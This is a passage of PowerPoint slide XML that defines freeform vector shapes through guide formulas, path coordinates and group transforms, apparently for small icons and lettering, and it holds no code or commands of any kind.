                    <a:lnTo>
                      <a:pt x="62" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62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21" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5164138" y="3854450"/>
                <a:ext cx="60325" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 169"/>
                  <a:gd name="T1" fmla="*/ 88 h 178"/>
                  <a:gd name="T2" fmla="*/ 168 w 169"/>
                  <a:gd name="T3" fmla="*/ 88 h 178"/>
                  <a:gd name="T4" fmla="*/ 159 w 169"/>
                  <a:gd name="T5" fmla="*/ 124 h 178"/>
                  <a:gd name="T6" fmla="*/ 142 w 169"/>
                  <a:gd name="T7" fmla="*/ 150 h 178"/>
                  <a:gd name="T8" fmla="*/ 115 w 169"/>
                  <a:gd name="T9" fmla="*/ 168 h 178"/>
                  <a:gd name="T10" fmla="*/ 80 w 169"/>
                  <a:gd name="T11" fmla="*/ 177 h 178"/>
                  <a:gd name="T12" fmla="*/ 80 w 169"/>
                  <a:gd name="T13" fmla="*/ 177 h 178"/>
                  <a:gd name="T14" fmla="*/ 53 w 169"/>
                  <a:gd name="T15" fmla="*/ 168 h 178"/>
                  <a:gd name="T16" fmla="*/ 27 w 169"/>
                  <a:gd name="T17" fmla="*/ 150 h 178"/>
                  <a:gd name="T18" fmla="*/ 9 w 169"/>
                  <a:gd name="T19" fmla="*/ 124 h 178"/>
                  <a:gd name="T20" fmla="*/ 0 w 169"/>
                  <a:gd name="T21" fmla="*/ 88 h 178"/>
                  <a:gd name="T22" fmla="*/ 0 w 169"/>
                  <a:gd name="T23" fmla="*/ 88 h 178"/>
                  <a:gd name="T24" fmla="*/ 9 w 169"/>
                  <a:gd name="T25" fmla="*/ 44 h 178"/>
                  <a:gd name="T26" fmla="*/ 27 w 169"/>
                  <a:gd name="T27" fmla="*/ 18 h 178"/>
                  <a:gd name="T28" fmla="*/ 53 w 169"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 89 w 169"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 89 w 169"/>
                  <a:gd name="T33" fmla="*/ 0 h 178"/>
                  <a:gd name="T34" fmla="*/ 124 w 169"/>
                  <a:gd name="T35" fmla="*/ 0 h 178"/>
                  <a:gd name="T36" fmla="*/ 150 w 169"/>
                  <a:gd name="T37" fmla="*/ 18 h 178"/>
                  <a:gd name="T38" fmla="*/ 159 w 169"/>
                  <a:gd name="T39" fmla="*/ 44 h 178"/>
                  <a:gd name="T40" fmla="*/ 168 w 169"/>
                  <a:gd name="T41" fmla="*/ 88 h 178"/>
                  <a:gd name="T42" fmla="*/ 36 w 169"/>
                  <a:gd name="T43" fmla="*/ 88 h 178"/>
                  <a:gd name="T44" fmla="*/ 36 w 169"/>
                  <a:gd name="T45" fmla="*/ 88 h 178"/>
                  <a:gd name="T46" fmla="*/ 36 w 169"/>
                  <a:gd name="T47" fmla="*/ 106 h 178"/>
                  <a:gd name="T48" fmla="*/ 44 w 169"/>
                  <a:gd name="T49" fmla="*/ 133 h 178"/>
                  <a:gd name="T50" fmla="*/ 62 w 169"/>
                  <a:gd name="T51" fmla="*/ 141 h 178"/>
                  <a:gd name="T52" fmla="*/ 89 w 169"/>
                  <a:gd name="T53" fmla="*/ 150 h 178"/>
                  <a:gd name="T54" fmla="*/ 89 w 169"/>
                  <a:gd name="T55" fmla="*/ 150 h 178"/>
                  <a:gd name="T56" fmla="*/ 106 w 169"/>
                  <a:gd name="T57" fmla="*/ 141 h 178"/>
                  <a:gd name="T58" fmla="*/ 124 w 169"/>
                  <a:gd name="T59" fmla="*/ 133 h 178"/>
                  <a:gd name="T60" fmla="*/ 133 w 169"/>
                  <a:gd name="T61" fmla="*/ 106 h 178"/>
                  <a:gd name="T62" fmla="*/ 142 w 169"/>
                  <a:gd name="T63" fmla="*/ 88 h 178"/>
                  <a:gd name="T64" fmla="*/ 142 w 169"/>
                  <a:gd name="T65" fmla="*/ 88 h 178"/>
                  <a:gd name="T66" fmla="*/ 133 w 169"/>
                  <a:gd name="T67" fmla="*/ 62 h 178"/>
                  <a:gd name="T68" fmla="*/ 124 w 169"/>
                  <a:gd name="T69" fmla="*/ 44 h 178"/>
                  <a:gd name="T70" fmla="*/ 106 w 169"/>
                  <a:gd name="T71" fmla="*/ 27 h 178"/>
                  <a:gd name="T72" fmla="*/ 89 w 169"/>
                  <a:gd name="T73" fmla="*/ 18 h 178"/>
                  <a:gd name="T74" fmla="*/ 89 w 169"/>
                  <a:gd name="T75" fmla="*/ 18 h 178"/>
                  <a:gd name="T76" fmla="*/ 62 w 169"/>
                  <a:gd name="T77" fmla="*/ 27 h 178"/>
                  <a:gd name="T78" fmla="*/ 44 w 169"/>
                  <a:gd name="T79" fmla="*/ 44 h 178"/>
                  <a:gd name="T80" fmla="*/ 36 w 169"/>
                  <a:gd name="T81" fmla="*/ 62 h 178"/>
                  <a:gd name="T82" fmla="*/ 36 w 169"/>
                  <a:gd name="T83" fmla="*/ 88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69" h="178">
                    <a:moveTo>
                      <a:pt x="168" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="88"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="88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22" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5237163" y="3854450"/>
                <a:ext cx="31750" cy="60325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 90"/>
                  <a:gd name="T1" fmla="*/ 53 h 169"/>
                  <a:gd name="T2" fmla="*/ 9 w 90"/>
                  <a:gd name="T3" fmla="*/ 53 h 169"/>
                  <a:gd name="T4" fmla="*/ 0 w 90"/>
                  <a:gd name="T5" fmla="*/ 0 h 169"/>
                  <a:gd name="T6" fmla="*/ 27 w 90"/>
                  <a:gd name="T7" fmla="*/ 0 h 169"/>
                  <a:gd name="T8" fmla="*/ 36 w 90"/>
                  <a:gd name="T9" fmla="*/ 35 h 169"/>
                  <a:gd name="T10" fmla="*/ 36 w 90"/>
                  <a:gd name="T11" fmla="*/ 35 h 169"/>
                  <a:gd name="T12" fmla="*/ 36 w 90"/>
                  <a:gd name="T13" fmla="*/ 35 h 169"/>
                  <a:gd name="T14" fmla="*/ 53 w 90"/>
                  <a:gd name="T15" fmla="*/ 9 h 169"/>
                  <a:gd name="T16" fmla="*/ 80 w 90"/>
                  <a:gd name="T17" fmla="*/ 0 h 169"/>
                  <a:gd name="T18" fmla="*/ 80 w 90"/>
                  <a:gd name="T19" fmla="*/ 0 h 169"/>
                  <a:gd name="T20" fmla="*/ 89 w 90"/>
                  <a:gd name="T21" fmla="*/ 0 h 169"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 27 h 169"/>
                  <a:gd name="T24" fmla="*/ 89 w 90"/>
                  <a:gd name="T25" fmla="*/ 27 h 169"/>
                  <a:gd name="T26" fmla="*/ 80 w 90"/>
                  <a:gd name="T27" fmla="*/ 27 h 169"/>
                  <a:gd name="T28" fmla="*/ 80 w 90"/>
                  <a:gd name="T29" fmla="*/ 27 h 169"/>
                  <a:gd name="T30" fmla="*/ 62 w 90"/>
                  <a:gd name="T31" fmla="*/ 27 h 169"/>
                  <a:gd name="T32" fmla="*/ 53 w 90"/>
                  <a:gd name="T33" fmla="*/ 35 h 169"/>
                  <a:gd name="T34" fmla="*/ 36 w 90"/>
                  <a:gd name="T35" fmla="*/ 62 h 169"/>
                  <a:gd name="T36" fmla="*/ 36 w 90"/>
                  <a:gd name="T37" fmla="*/ 62 h 169"/>
                  <a:gd name="T38" fmla="*/ 36 w 90"/>
                  <a:gd name="T39" fmla="*/ 80 h 169"/>
                  <a:gd name="T40" fmla="*/ 36 w 90"/>
                  <a:gd name="T41" fmla="*/ 168 h 169"/>
                  <a:gd name="T42" fmla="*/ 9 w 90"/>
                  <a:gd name="T43" fmla="*/ 168 h 169"/>
                  <a:gd name="T44" fmla="*/ 9 w 90"/>
                  <a:gd name="T45" fmla="*/ 53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0" h="169">
                    <a:moveTo>
                      <a:pt x="9" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="423" name="Group 422"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2907692" y="3983094"/>
            <a:ext cx="1683533" cy="1753017"/>
            <a:chOff x="2904517" y="3979919"/>
            <a:chExt cx="1683533" cy="1753017"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="424" name="Freeform 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3121113" y="3979919"/>
              <a:ext cx="1466937" cy="1753017"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3134 w 6195"/>
                <a:gd name="T1" fmla="*/ 3213 h 7403"/>
                <a:gd name="T2" fmla="*/ 3097 w 6195"/>
                <a:gd name="T3" fmla="*/ 3228 h 7403"/>
                <a:gd name="T4" fmla="*/ 3087 w 6195"/>
                <a:gd name="T5" fmla="*/ 3559 h 7403"/>
                <a:gd name="T6" fmla="*/ 3097 w 6195"/>
                <a:gd name="T7" fmla="*/ 3596 h 7403"/>
                <a:gd name="T8" fmla="*/ 3134 w 6195"/>
                <a:gd name="T9" fmla="*/ 3611 h 7403"/>
                <a:gd name="T10" fmla="*/ 3454 w 6195"/>
                <a:gd name="T11" fmla="*/ 3606 h 7403"/>
                <a:gd name="T12" fmla="*/ 3480 w 6195"/>
                <a:gd name="T13" fmla="*/ 3580 h 7403"/>
                <a:gd name="T14" fmla="*/ 3485 w 6195"/>
                <a:gd name="T15" fmla="*/ 3265 h 7403"/>
                <a:gd name="T16" fmla="*/ 3470 w 6195"/>
                <a:gd name="T17" fmla="*/ 3228 h 7403"/>
                <a:gd name="T18" fmla="*/ 4000 w 6195"/>
                <a:gd name="T19" fmla="*/ 0 h 7403"/>
                <a:gd name="T20" fmla="*/ 10 w 6195"/>
                <a:gd name="T21" fmla="*/ 278 h 7403"/>
                <a:gd name="T22" fmla="*/ 125 w 6195"/>
                <a:gd name="T23" fmla="*/ 1086 h 7403"/>
                <a:gd name="T24" fmla="*/ 330 w 6195"/>
                <a:gd name="T25" fmla="*/ 1858 h 7403"/>
                <a:gd name="T26" fmla="*/ 635 w 6195"/>
                <a:gd name="T27" fmla="*/ 2593 h 7403"/>
                <a:gd name="T28" fmla="*/ 1018 w 6195"/>
                <a:gd name="T29" fmla="*/ 3275 h 7403"/>
                <a:gd name="T30" fmla="*/ 1480 w 6195"/>
                <a:gd name="T31" fmla="*/ 3900 h 7403"/>
                <a:gd name="T32" fmla="*/ 2015 w 6195"/>
                <a:gd name="T33" fmla="*/ 4467 h 7403"/>
                <a:gd name="T34" fmla="*/ 2614 w 6195"/>
                <a:gd name="T35" fmla="*/ 4966 h 7403"/>
                <a:gd name="T36" fmla="*/ 3271 w 6195"/>
                <a:gd name="T37" fmla="*/ 5391 h 7403"/>
                <a:gd name="T38" fmla="*/ 3979 w 6195"/>
                <a:gd name="T39" fmla="*/ 5732 h 7403"/>
                <a:gd name="T40" fmla="*/ 4735 w 6195"/>
                <a:gd name="T41" fmla="*/ 5985 h 7403"/>
                <a:gd name="T42" fmla="*/ 6194 w 6195"/>
                <a:gd name="T43" fmla="*/ 7402 h 7403"/>
                <a:gd name="T44" fmla="*/ 6084 w 6195"/>
                <a:gd name="T45" fmla="*/ 2178 h 7403"/>
                <a:gd name="T46" fmla="*/ 5769 w 6195"/>
                <a:gd name="T47" fmla="*/ 2121 h 7403"/>
                <a:gd name="T48" fmla="*/ 5470 w 6195"/>
                <a:gd name="T49" fmla="*/ 2015 h 7403"/>
                <a:gd name="T50" fmla="*/ 5186 w 6195"/>
                <a:gd name="T51" fmla="*/ 1874 h 7403"/>
                <a:gd name="T52" fmla="*/ 4929 w 6195"/>
                <a:gd name="T53" fmla="*/ 1701 h 7403"/>
                <a:gd name="T54" fmla="*/ 4698 w 6195"/>
                <a:gd name="T55" fmla="*/ 1496 h 7403"/>
                <a:gd name="T56" fmla="*/ 4493 w 6195"/>
                <a:gd name="T57" fmla="*/ 1265 h 7403"/>
                <a:gd name="T58" fmla="*/ 4320 w 6195"/>
                <a:gd name="T59" fmla="*/ 1008 h 7403"/>
                <a:gd name="T60" fmla="*/ 4179 w 6195"/>
                <a:gd name="T61" fmla="*/ 724 h 7403"/>
                <a:gd name="T62" fmla="*/ 4073 w 6195"/>
                <a:gd name="T63" fmla="*/ 425 h 7403"/>
                <a:gd name="T64" fmla="*/ 4016 w 6195"/>
                <a:gd name="T65" fmla="*/ 110 h 7403"/>
                <a:gd name="T66" fmla="*/ 4657 w 6195"/>
                <a:gd name="T67" fmla="*/ 3916 h 7403"/>
                <a:gd name="T68" fmla="*/ 4583 w 6195"/>
                <a:gd name="T69" fmla="*/ 3984 h 7403"/>
                <a:gd name="T70" fmla="*/ 4483 w 6195"/>
                <a:gd name="T71" fmla="*/ 4011 h 7403"/>
                <a:gd name="T72" fmla="*/ 2058 w 6195"/>
                <a:gd name="T73" fmla="*/ 4011 h 7403"/>
                <a:gd name="T74" fmla="*/ 1984 w 6195"/>
                <a:gd name="T75" fmla="*/ 3984 h 7403"/>
                <a:gd name="T76" fmla="*/ 1942 w 6195"/>
                <a:gd name="T77" fmla="*/ 3953 h 7403"/>
                <a:gd name="T78" fmla="*/ 1916 w 6195"/>
                <a:gd name="T79" fmla="*/ 3916 h 7403"/>
                <a:gd name="T80" fmla="*/ 1884 w 6195"/>
                <a:gd name="T81" fmla="*/ 3816 h 7403"/>
                <a:gd name="T82" fmla="*/ 1900 w 6195"/>
                <a:gd name="T83" fmla="*/ 3743 h 7403"/>
                <a:gd name="T84" fmla="*/ 3107 w 6195"/>
                <a:gd name="T85" fmla="*/ 1517 h 7403"/>
                <a:gd name="T86" fmla="*/ 3160 w 6195"/>
                <a:gd name="T87" fmla="*/ 1454 h 7403"/>
                <a:gd name="T88" fmla="*/ 3207 w 6195"/>
                <a:gd name="T89" fmla="*/ 1427 h 7403"/>
                <a:gd name="T90" fmla="*/ 3286 w 6195"/>
                <a:gd name="T91" fmla="*/ 1412 h 7403"/>
                <a:gd name="T92" fmla="*/ 3338 w 6195"/>
                <a:gd name="T93" fmla="*/ 1417 h 7403"/>
                <a:gd name="T94" fmla="*/ 3386 w 6195"/>
                <a:gd name="T95" fmla="*/ 1438 h 7403"/>
                <a:gd name="T96" fmla="*/ 3459 w 6195"/>
                <a:gd name="T97" fmla="*/ 1517 h 7403"/>
                <a:gd name="T98" fmla="*/ 4672 w 6195"/>
                <a:gd name="T99" fmla="*/ 3743 h 7403"/>
                <a:gd name="T100" fmla="*/ 4687 w 6195"/>
                <a:gd name="T101" fmla="*/ 3816 h 7403"/>
                <a:gd name="T102" fmla="*/ 4657 w 6195"/>
                <a:gd name="T103" fmla="*/ 3916 h 7403"/>
                <a:gd name="T104" fmla="*/ 5995 w 6195"/>
                <a:gd name="T105" fmla="*/ 7202 h 7403"/>
                <a:gd name="T106" fmla="*/ 3496 w 6195"/>
                <a:gd name="T107" fmla="*/ 2231 h 7403"/>
                <a:gd name="T108" fmla="*/ 3113 w 6195"/>
                <a:gd name="T109" fmla="*/ 2210 h 7403"/>
                <a:gd name="T110" fmla="*/ 3076 w 6195"/>
                <a:gd name="T111" fmla="*/ 2231 h 7403"/>
                <a:gd name="T112" fmla="*/ 3060 w 6195"/>
                <a:gd name="T113" fmla="*/ 2262 h 7403"/>
                <a:gd name="T114" fmla="*/ 3092 w 6195"/>
                <a:gd name="T115" fmla="*/ 2992 h 7403"/>
                <a:gd name="T116" fmla="*/ 3118 w 6195"/>
                <a:gd name="T117" fmla="*/ 3008 h 7403"/>
                <a:gd name="T118" fmla="*/ 3428 w 6195"/>
                <a:gd name="T119" fmla="*/ 3013 h 7403"/>
                <a:gd name="T120" fmla="*/ 3465 w 6195"/>
                <a:gd name="T121" fmla="*/ 3003 h 7403"/>
                <a:gd name="T122" fmla="*/ 3512 w 6195"/>
                <a:gd name="T123" fmla="*/ 2257 h 7403"/>
                <a:gd name="T124" fmla="*/ 3496 w 6195"/>
                <a:gd name="T125" fmla="*/ 2231 h 7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195" h="7403">
                  <a:moveTo>
                    <a:pt x="3433" y="3213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3213"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="400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0" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="1086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="1606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="1858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="2593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="2824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018" y="3275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165" y="3491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="3900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827" y="4289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="4467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271" y="5391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501" y="5512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979" y="5732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="5827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478" y="5911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4735" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="6047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6084" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5979" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5874" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5769" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5669" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5470" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5186" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
